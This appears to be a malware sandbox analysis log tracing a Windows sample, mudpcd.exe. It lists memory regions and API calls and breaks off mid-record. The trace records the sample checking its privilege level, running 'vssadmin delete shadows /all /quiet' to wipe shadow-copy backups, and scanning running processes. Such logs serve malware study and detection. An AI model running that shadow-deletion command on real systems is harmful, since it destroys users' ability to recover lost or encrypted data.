# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Feb 15 2019 13:52:06 # Log Creation Date: 19.02.2019 16:03:15.055 Process: id = "1" image_name = "mudpcd.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mudpcd.exe" page_root = "0x3ec17000" os_pid = "0x97c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mudpcd.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e814" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 6 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 7 start_va = 0xf00000 end_va = 0xf05fff entry_point = 0xf00000 region_type = mapped_file name = "mudpcd.exe" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mudpcd.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mudpcd.exe") Region: id = 8 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9 start_va = 0x77a40000 end_va = 0x77bbffff entry_point = 0x77a40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 11 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 12 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 13 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 14 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 15 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 16 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 149 start_va = 0x310000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 150 start_va = 0x74f80000 end_va = 0x74f87fff entry_point = 0x74f80000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 151 start_va = 0x74f90000 end_va = 0x74febfff entry_point = 0x74f90000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 152 start_va = 0x74ff0000 end_va = 0x7502efff entry_point = 0x74ff0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 153 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 154 start_va = 0x773b0000 end_va = 0x774bffff entry_point = 0x773b0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 155 start_va = 0x775f0000 end_va = 0x77635fff entry_point = 0x775f0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 156 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x0 region_type = private name = "private_0x0000000077640000" filename = "" Region: id = 157 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x0 region_type = private name = "private_0x0000000077740000" filename = "" Region: id = 158 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 159 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 160 start_va = 0x75590000 end_va = 0x7559bfff entry_point = 0x75590000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 161 start_va = 0x755a0000 end_va = 0x755fffff entry_point = 0x755a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 162 start_va = 0x75660000 end_va = 0x7570bfff entry_point = 0x75660000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 163 start_va = 0x75710000 end_va = 0x75719fff entry_point = 0x75710000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 164 start_va = 0x75a60000 end_va = 0x75a78fff entry_point = 0x75a60000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 165 start_va = 0x75a80000 end_va = 0x75b0ffff entry_point = 0x75a80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 166 start_va = 0x75b10000 end_va = 0x75bfffff entry_point = 0x75b10000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 167 start_va = 0x76f90000 end_va = 0x7702ffff entry_point = 0x76f90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 168 start_va = 0x771d0000 end_va = 0x772cffff entry_point = 0x771d0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 169 start_va = 0x77350000 end_va = 0x773a6fff entry_point = 0x77350000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 170 start_va = 0x77550000 end_va = 0x775ecfff entry_point = 0x77550000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 171 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 172 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 173 start_va = 0x75470000 end_va = 0x75481fff entry_point = 0x75470000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 174 start_va = 0x75cc0000 end_va = 0x76909fff entry_point = 0x75cc0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 175 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 176 start_va = 0x610000 end_va = 0x797fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 177 start_va = 0x76b30000 end_va = 0x76bfbfff entry_point = 0x76b30000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 178 start_va = 0x76c00000 end_va = 0x76c5ffff entry_point = 0x76c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 179 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 180 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 181 start_va = 0x7a0000 end_va = 0x920fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 182 start_va = 0xf10000 end_va = 0x230ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 183 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 184 start_va = 0x1e0000 end_va = 0x1e6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 185 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 186 start_va = 0x930000 end_va = 0xbfefff entry_point = 0x930000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 187 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 188 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 189 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 190 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 191 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 192 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 193 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 194 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 195 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 196 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 197 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 198 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 199 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 200 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 201 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 202 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 203 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 204 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 205 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 206 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 207 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 208 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 209 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 210 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 211 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 212 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 213 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 214 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 215 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 216 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 217 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 218 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 219 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 220 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 221 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 222 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 223 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 224 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 225 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 226 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 227 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 228 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 229 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 230 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 231 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 232 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 233 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 234 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 235 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 236 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 237 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 238 start_va = 0x75450000 end_va = 0x75465fff entry_point = 0x75450000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 252 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 256 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 257 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 258 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 259 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 260 start_va = 0x75410000 end_va = 0x7544afff entry_point = 0x75410000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 261 start_va = 0x75720000 end_va = 0x7583cfff entry_point = 0x75720000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 262 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 263 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 264 start_va = 0x2310000 end_va = 0x2702fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002310000" filename = "" Region: id = 265 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 266 start_va = 0xca0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 267 start_va = 0xde0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 268 start_va = 0x2860000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 269 start_va = 0x75400000 end_va = 0x75407fff entry_point = 0x75400000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 270 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 271 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 295 start_va = 0x753d0000 end_va = 0x753f8fff entry_point = 0x753d0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 296 start_va = 0x753b0000 end_va = 0x753c3fff entry_point = 0x753b0000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 316 start_va = 0x75390000 end_va = 0x753a6fff entry_point = 0x75390000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 317 start_va = 0x75380000 end_va = 0x75387fff entry_point = 0x75380000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 318 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 319 start_va = 0x2a50000 end_va = 0x2b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 320 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 321 start_va = 0x75370000 end_va = 0x7537efff entry_point = 0x75370000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 322 start_va = 0x3d0000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 323 start_va = 0x2cc0000 end_va = 0x2dbffff entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 324 start_va = 0x75360000 end_va = 0x7536afff entry_point = 0x75360000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 325 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 326 start_va = 0x75350000 end_va = 0x75358fff entry_point = 0x75350000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 327 start_va = 0x75340000 end_va = 0x7534cfff entry_point = 0x75340000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 617 start_va = 0x530000 end_va = 0x5effff entry_point = 0x530000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 618 start_va = 0x2b0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 619 start_va = 0x2740000 end_va = 0x283ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 620 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 621 start_va = 0xce0000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Thread: id = 1 os_tid = 0x980 [0040.143] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x16f864 | out: TokenHandle=0x16f864*=0x80) returned 1 [0040.143] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f868 | out: TokenInformation=0x0, ReturnLength=0x16f868) returned 0 [0040.143] GetLastError () returned 0x7a [0040.143] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x19, TokenInformation=0x444640, TokenInformationLength=0x14, ReturnLength=0x16f868 | out: TokenInformation=0x444640, ReturnLength=0x16f868) returned 1 [0040.143] GetSidSubAuthorityCount (pSid=0x444648*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x444649 [0040.143] GetSidSubAuthority (pSid=0x444648*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x444650 [0040.144] CloseHandle (hObject=0x80) returned 1 [0040.144] lstrcpyW (in: lpString1=0x16f880, lpString2=" delete shadows /all /quiet" | out: lpString1=" delete shadows /all /quiet") returned=" delete shadows /all /quiet" [0040.144] CreateProcessW (in: lpApplicationName="C:\\Windows\\sysnative\\vssadmin.exe", lpCommandLine=" delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x16fa88*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16facc | out: lpCommandLine=" delete shadows /all /quiet", lpProcessInformation=0x16facc*(hProcess=0x84, hThread=0x80, dwProcessId=0x984, dwThreadId=0x988)) returned 1 [0040.278] CloseHandle (hObject=0x80) returned 1 [0040.278] CloseHandle (hObject=0x84) returned 1 [0040.278] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x84 [0040.280] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0040.280] lstrcmpW (lpString1="[System Process]", lpString2="null.exe") returned -1 [0040.282] lstrcmpW (lpString1="[System Process]", lpString2="nan.exe") returned -1 [0040.282] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0040.283] lstrcmpW (lpString1="System", lpString2="null.exe") returned 1 [0040.283] lstrcmpW (lpString1="System", lpString2="nan.exe") returned 1 [0040.283] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0040.283] lstrcmpW (lpString1="smss.exe", lpString2="null.exe") returned 1 [0040.283] lstrcmpW (lpString1="smss.exe", lpString2="nan.exe") returned 1 [0040.283] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.284] lstrcmpW (lpString1="csrss.exe", lpString2="null.exe") returned -1 [0040.284] lstrcmpW (lpString1="csrss.exe", lpString2="nan.exe") returned -1 [0040.284] Process32NextW (in: hSnapshot=0x84, lppe=0x16f640 | out: lppe=0x16f640*(dwSize=0x22c, cntUsage=0x0, 